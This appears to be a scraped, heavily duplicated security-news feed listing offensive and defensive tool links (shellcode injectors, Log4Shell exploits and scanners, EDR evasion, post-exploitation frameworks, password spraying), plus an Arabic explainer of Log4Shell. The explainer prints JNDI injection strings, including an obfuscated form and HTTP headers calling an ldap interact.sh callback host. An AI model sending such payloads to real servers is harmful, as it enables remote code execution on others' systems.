Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL
https://github.com/snovvcrash/DInjector
venom C2 shellcode generator, compiler, handler
https://github.com/r00t-3xp10it/venom
https://github.com/snovvcrash/DInjector
venom C2 shellcode generator, compiler, handler
https://github.com/r00t-3xp10it/venom
#CVE-2021-44228 #Log4Shell #RCE
Log4j2 RCE Passive Scanner
plugin for BurpSuite
https://github.com/whwlsfb/Log4j2Scan
Nmap NSE scripts to check against log4shell
https://github.com/Diverto/nse-log4shell
The source IP uses Apache Log4j
RCE to try to attack
https://github.com/RedDrip7/Log4Shell_CVE-2021-44228_related_attacks_IOCs
Log4j2 RCE Passive Scanner
plugin for BurpSuite
https://github.com/whwlsfb/Log4j2Scan
Nmap NSE scripts to check against log4shell
https://github.com/Diverto/nse-log4shell
The source IP uses Apache Log4j
RCE to try to attack
https://github.com/RedDrip7/Log4Shell_CVE-2021-44228_related_attacks_IOCs
A script that checks for vulnerable Log4j systems using injection of the payload in common HTTP headers
https://github.com/NorthwaveSecurity/log4jcheck
log4j rce test environment and poc
https://github.com/leonjza/log4jpwn
Find log4j on some places
https://github.com/perryflynn/find-log4j
check whether one of your applications is affected by a bug Log4Shell
https://github.com/alexbakker/log4shell-tools
https://github.com/NorthwaveSecurity/log4jcheck
log4j rce test environment and poc
https://github.com/leonjza/log4jpwn
Find log4j on some places
https://github.com/perryflynn/find-log4j
check whether one of your applications is affected by a bug Log4Shell
https://github.com/alexbakker/log4shell-tools
#CVE-2021-3939 #ubuntu #accountsservice
poc
https://github.com/github/securitylab/tree/b36e194556f956c3ec63bf9d8af454c8f620f33a/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939
Getting root on Ubuntu through wishful thinking
https://securitylab.github.com/research/ubuntu-accountsservice-CVE-2021-3939
poc
https://github.com/github/securitylab/tree/b36e194556f956c3ec63bf9d8af454c8f620f33a/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939
Getting root on Ubuntu through wishful thinking
https://securitylab.github.com/research/ubuntu-accountsservice-CVE-2021-3939
Python implementation for #CVE-2021-42278 Active Directory Privilege Escalation
https://github.com/ly4k/Pachine
https://github.com/ly4k/Pachine
make use of a filesystem #bug for the #Playstation_4 on #firmware 9.00 to allow jailbreaking and kernel-level modifications to the system
https://github.com/ChendoChap/pOOBs4
https://github.com/ChendoChap/pOOBs4
explore Javascript Prototype Pollution
https://youtube.com/watch?v=XS_UMqQalLI&feature
https://youtube.com/watch?v=XS_UMqQalLI&feature
ثغرة Log4Shell
الأسبوع الماضي تم طرح الإصدار 2.15 من أداة التسجيل Log4j لمعالجة ثغرة CVE-2021-44228 حيث تم إلغاء اتاحة جانب واحد فقط من وظائف استرجاع الرسائل في JNDI ثم تبين أنه لا يزال من الممكن استغلال الإصدار 2.15 من خلال تكوينات معينة ولكن تم حجب التفاصيل الفنية الإضافية للخطأ لمنع المزيد من الاستغلال
_ أقرت شركة Apache بالخطأ مرة أخرى ولذلك قامت بتعطيل كافة دعم JNDI بشكل افتراضي وإزالة معالجة البحث عن الرسائل تماما وقامت بإصدار الإصلاح الثاني Log4j 2.16 لمعالجة الخطأ الذي تم تعيينه كـ CVE-2021-45046
كيف تعمل ثغرة Log4Shell ..؟
بدايةً ما هو Log4j و JNDI ..؟
Log4j
مكتبة Java بمثابة أداة مساعدة تستخدم على نطاق واسع في برامج Java لتسجيل رسائل الخطأ في التطبيقات وتستخدم أيضا في خدمات cloud computing
JNDI
واجهة برمجة تطبيقات Java APIs تستخدمها Log4j لاسترداد العناصر والكائنات من وحدات الخدمة البعيدة ويمكن له الاستفادة من من العديد من واجهات الدليل بما في ذلك واجهة بروتوكول الوصول الخفيف إلى الدليل LDAP ونظام اسماء المجال (DNS) وبروتوكول (IIOP)
سبب الخلل
عند تشغيل ميزة استبدال البحث عن الرسائل ستكتشف Log4j السلاسل التي تشير إلى موارد JNDI في مصادر التكوين ورسائل السجل والمعاملات التي تم تمريرها بواسطة التطبيقات، ونظرا لأن Log4j لا يقوم بالتحقق من عناوين url التي تم إرسالها في هذه السلاسل يمكن للمهاجم إنشاء طلبات ضارة للتطبيقات التي تستخدم Log4j باستبدال الرسائل في الحقول التي تحتوي على عناوين url بخوادم ضارة
على سبيل المثال في تطبيقات الويب نظرا لأنه يتم تسجيل طلبات HTTP بشكل متكرر فإن متجه الهجوم الشائع هو وضع السلسلة الضارة في عنوان url لطلب HTTP أو رأس HTTP يتم تسجيله بشكل متكرر
مثل:
${jndi:[protocol]://[remote server and code address]}
يتم عرض عنوان url الذي قام المهاجم بتعيينه كبيانات عنصر Java وبعدها يتم تحميل البيانات من هذا العنوان إذا كان متصلا بالإنترنت وبإدخال سلسلة يتم تسجيلها يمكن للمهاجم تحميل وتنفيذ تعليمات برمجية ضارة مستضافة على عنوان url عام يتم تنفيذها تلقائيا في الذاكرة
يوجد مجموعة متنوعة من أشكال التعتيم تُستخدم لمنع اكتشاف الفحص أو الاستغلال مثل:
($ {$ {:: - j} $ {:: - n} $ {:: - d} $ {:: - I})
بعض رؤوس HTTP التي لاحظها الباحثون في طلب GET
referer=${jndi:ldap://[redacted].interact.sh}
x-http-host-override=${jndi:ldap://[redacted].interact.sh}
true-client-ip=${jndi:ldap://[redacted].interact.sh}
x-forwarded-port=443, x-client-ip=${jndi:ldap://[redacted].interact.sh}
cf-connecting_ip=${jndi:ldap://[redacted].interact.sh}
x-forwarded-host=${jndi:ldap://[redacted].interact.sh}
contact=${jndi:ldap://[redacted].interact.sh}
لاحظ الباحثون أيضا تحول المهاجمين إلى واجهة برمجة تطبيقات RMI بدلا من واجهة بروتوكول LDAP
Log4j 2.16.0 _ CVE-2021-45046
https://logging.apache.org/log4j/2.x/security.html
لفحص ثغرات Log4Shell وإصلاحها بما في ذلك log4j 2.15.0 المصنفة CVE-2021-45046
https://github.com/logpresso/CVE-2021-44228-Scanner
Find vulnerable Log4j2 versions on disk and also inside Java Archive Files
https://github.com/fox-it/log4j-finder
الأسبوع الماضي تم طرح الإصدار 2.15 من أداة التسجيل Log4j لمعالجة ثغرة CVE-2021-44228 حيث تم إلغاء اتاحة جانب واحد فقط من وظائف استرجاع الرسائل في JNDI ثم تبين أنه لا يزال من الممكن استغلال الإصدار 2.15 من خلال تكوينات معينة ولكن تم حجب التفاصيل الفنية الإضافية للخطأ لمنع المزيد من الاستغلال
_ أقرت شركة Apache بالخطأ مرة أخرى ولذلك قامت بتعطيل كافة دعم JNDI بشكل افتراضي وإزالة معالجة البحث عن الرسائل تماما وقامت بإصدار الإصلاح الثاني Log4j 2.16 لمعالجة الخطأ الذي تم تعيينه كـ CVE-2021-45046
كيف تعمل ثغرة Log4Shell ..؟
بدايةً ما هو Log4j و JNDI ..؟
Log4j
مكتبة Java بمثابة أداة مساعدة تستخدم على نطاق واسع في برامج Java لتسجيل رسائل الخطأ في التطبيقات وتستخدم أيضا في خدمات cloud computing
JNDI
واجهة برمجة تطبيقات Java APIs تستخدمها Log4j لاسترداد العناصر والكائنات من وحدات الخدمة البعيدة ويمكن له الاستفادة من من العديد من واجهات الدليل بما في ذلك واجهة بروتوكول الوصول الخفيف إلى الدليل LDAP ونظام اسماء المجال (DNS) وبروتوكول (IIOP)
سبب الخلل
عند تشغيل ميزة استبدال البحث عن الرسائل ستكتشف Log4j السلاسل التي تشير إلى موارد JNDI في مصادر التكوين ورسائل السجل والمعاملات التي تم تمريرها بواسطة التطبيقات، ونظرا لأن Log4j لا يقوم بالتحقق من عناوين url التي تم إرسالها في هذه السلاسل يمكن للمهاجم إنشاء طلبات ضارة للتطبيقات التي تستخدم Log4j باستبدال الرسائل في الحقول التي تحتوي على عناوين url بخوادم ضارة
على سبيل المثال في تطبيقات الويب نظرا لأنه يتم تسجيل طلبات HTTP بشكل متكرر فإن متجه الهجوم الشائع هو وضع السلسلة الضارة في عنوان url لطلب HTTP أو رأس HTTP يتم تسجيله بشكل متكرر
مثل:
${jndi:[protocol]://[remote server and code address]}
يتم عرض عنوان url الذي قام المهاجم بتعيينه كبيانات عنصر Java وبعدها يتم تحميل البيانات من هذا العنوان إذا كان متصلا بالإنترنت وبإدخال سلسلة يتم تسجيلها يمكن للمهاجم تحميل وتنفيذ تعليمات برمجية ضارة مستضافة على عنوان url عام يتم تنفيذها تلقائيا في الذاكرة
يوجد مجموعة متنوعة من أشكال التعتيم تُستخدم لمنع اكتشاف الفحص أو الاستغلال مثل:
($ {$ {:: - j} $ {:: - n} $ {:: - d} $ {:: - I})
بعض رؤوس HTTP التي لاحظها الباحثون في طلب GET
referer=${jndi:ldap://[redacted].interact.sh}
x-http-host-override=${jndi:ldap://[redacted].interact.sh}
true-client-ip=${jndi:ldap://[redacted].interact.sh}
x-forwarded-port=443, x-client-ip=${jndi:ldap://[redacted].interact.sh}
cf-connecting_ip=${jndi:ldap://[redacted].interact.sh}
x-forwarded-host=${jndi:ldap://[redacted].interact.sh}
contact=${jndi:ldap://[redacted].interact.sh}
لاحظ الباحثون أيضا تحول المهاجمين إلى واجهة برمجة تطبيقات RMI بدلا من واجهة بروتوكول LDAP
Log4j 2.16.0 _ CVE-2021-45046
https://logging.apache.org/log4j/2.x/security.html
لفحص ثغرات Log4Shell وإصلاحها بما في ذلك log4j 2.15.0 المصنفة CVE-2021-45046
https://github.com/logpresso/CVE-2021-44228-Scanner
Find vulnerable Log4j2 versions on disk and also inside Java Archive Files
https://github.com/fox-it/log4j-finder
generating workable JNDI links and provide background services by starting RMI server,LDAP server and HTTP server
https://github.com/welk1n/JNDI-Injection-Exploit
A malicious LDAP server for JNDI injection attacks
https://github.com/veracode-research/rogue-jndi
https://github.com/welk1n/JNDI-Injection-Exploit
A malicious LDAP server for JNDI injection attacks
https://github.com/veracode-research/rogue-jndi
Collection of Windows usermode exploits targeting various third-party software applications
https://github.com/FULLSHADE/OSCE
A Windows user-mode shellcode execution tool that demonstrates various techniques that malware uses
https://github.com/FULLSHADE/Jektor
Escalate from a low-integrity Administrator account to NT AUTHORITY\SYSTEM without an LPE exploit by combining a COM UAC bypass and Token Impersonation
https://github.com/FULLSHADE/Auto-Elevate
https://github.com/FULLSHADE/OSCE
A Windows user-mode shellcode execution tool that demonstrates various techniques that malware uses
https://github.com/FULLSHADE/Jektor
Escalate from a low-integrity Administrator account to NT AUTHORITY\SYSTEM without an LPE exploit by combining a COM UAC bypass and Token Impersonation
https://github.com/FULLSHADE/Auto-Elevate
A deep dive into an NSO zero-click
iMessage #exploit: RCE #ios
https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html?m=1
#vulnerability in ART that allows normal apps to insert arbitrary code into #android
https://bugs.chromium.org/p/project-zero/issues/detail?id=2227
#exploitation of CVE-2021-21220
from incorrect jit behavior to RCE #chrome
https://www.zerodayinitiative.com/blog/2021/12/15/exploitation-of-cve-2021-21220-from-incorrect-jit-behavior-to-rce
iMessage #exploit: RCE #ios
https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html?m=1
#vulnerability in ART that allows normal apps to insert arbitrary code into #android
https://bugs.chromium.org/p/project-zero/issues/detail?id=2227
#exploitation of CVE-2021-21220
from incorrect jit behavior to RCE #chrome
https://www.zerodayinitiative.com/blog/2021/12/15/exploitation-of-cve-2021-21220-from-incorrect-jit-behavior-to-rce
Improving OSS-Fuzz and #Jazzer to catch Log4Shell
https://security.googleblog.com/2021/12/improving-oss-fuzz-and-jazzer-to-catch.html?m=1
#Jazzer Coverage-guided, in-process fuzzing for the JVM
https://github.com/CodeIntelligenceTesting/jazzer
https://security.googleblog.com/2021/12/improving-oss-fuzz-and-jazzer-to-catch.html?m=1
#Jazzer Coverage-guided, in-process fuzzing for the JVM
https://github.com/CodeIntelligenceTesting/jazzer
An Awesome List of Log4Shell resources to help you stay informed and secure
https://github.com/snyk-labs/awesome-log4shell
parsing RMI and LDAP protocol implementation
https://github.com/EmYiQing/JNDIScan
https://github.com/snyk-labs/awesome-log4shell
parsing RMI and LDAP protocol implementation
https://github.com/EmYiQing/JNDIScan
Log4Shell RCE Exploit fully independent exploit does not require any 3rd party binaries
https://github.com/cyberstruggle/L4sh
Log4j Scanner coded in Powershell
https://github.com/Maelstromage/Log4jSherlock
open detection and scanning tool for discovering and fuzzing for Log4J RCE
https://github.com/TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit
CVE-2021-22005 vulnerability which exists in the analysis service of vCenter Server
https://github.com/shmilylty/cve-2021-22005-exp
Windows Common Log File System Driver poc
https://github.com/KaLendsi/CVE-2021-43224-POC
https://github.com/cyberstruggle/L4sh
Log4j Scanner coded in Powershell
https://github.com/Maelstromage/Log4jSherlock
open detection and scanning tool for discovering and fuzzing for Log4J RCE
https://github.com/TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit
CVE-2021-22005 vulnerability which exists in the analysis service of vCenter Server
https://github.com/shmilylty/cve-2021-22005-exp
Windows Common Log File System Driver poc
https://github.com/KaLendsi/CVE-2021-43224-POC
evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)
https://github.com/0xsp-SRD/mortar
This program is designed to demonstrate various process injection techniques
https://github.com/3xpl01tc0d3r/ProcessInjection
https://github.com/0xsp-SRD/mortar
This program is designed to demonstrate various process injection techniques
https://github.com/3xpl01tc0d3r/ProcessInjection
Ghost Framework is an Android post-exploitation framework that exploits the Android Debug Bridge to remotely access an Android device
https://github.com/EntySec/ghost
linux post-exploitation framework made by linux user
https://github.com/jm33-m0/emp3r0r
https://github.com/EntySec/ghost
linux post-exploitation framework made by linux user
https://github.com/jm33-m0/emp3r0r
Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD)
https://github.com/MarkoH17/Spray365
AD_Enum is a pentesting tool that allows to find misconfiguration through the the protocol LDAP and exploit some of those weaknesses with kerberos
https://github.com/SecuProject/ADenum
https://github.com/MarkoH17/Spray365
AD_Enum is a pentesting tool that allows to find misconfiguration through the the protocol LDAP and exploit some of those weaknesses with kerberos
https://github.com/SecuProject/ADenum
Android Reverse-Engineering Workbench for VS Code
https://github.com/APKLab/APKLab
Scanning APK file for URIs, endpoints & secrets
https://github.com/dwisiswant0/apkleaks
https://github.com/APKLab/APKLab
Scanning APK file for URIs, endpoints & secrets
https://github.com/dwisiswant0/apkleaks
Overlord provides a python-based console CLI which is used to build Red Teaming infrastructure in an automated way
https://github.com/qsecure-labs/overlord
Web Cache Vulnerability Scanner is a Go-based CLI tool for testing for web cache poisoning
https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner
https://github.com/qsecure-labs/overlord
Web Cache Vulnerability Scanner is a Go-based CLI tool for testing for web cache poisoning
https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner
a recon tool that allows searching on URLs that are exposed via shortener services
https://github.com/utkusen/urlhunter
This tool is design to find admin panel of any website by using custom wordlist or default wordlist easily and allow you to find admin panel trough a proxy server
https://github.com/alienwhatever/Admin-Scanner
https://github.com/utkusen/urlhunter
This tool is design to find admin panel of any website by using custom wordlist or default wordlist easily and allow you to find admin panel trough a proxy server
https://github.com/alienwhatever/Admin-Scanner
Penetration Testing and Hacking CTF's Swiss Army Knife with: Reverse Shell Handling - Encoding/Decoding - Encryption/Decryption - Cracking Hashes / Hashing
https://github.com/helich0pper/Karkinos
simplify penetration testing of networks and to create a swiss army knife that is made for running on Windows
https://github.com/cube0x0/SharpMapExec
https://github.com/helich0pper/Karkinos
simplify penetration testing of networks and to create a swiss army knife that is made for running on Windows
https://github.com/cube0x0/SharpMapExec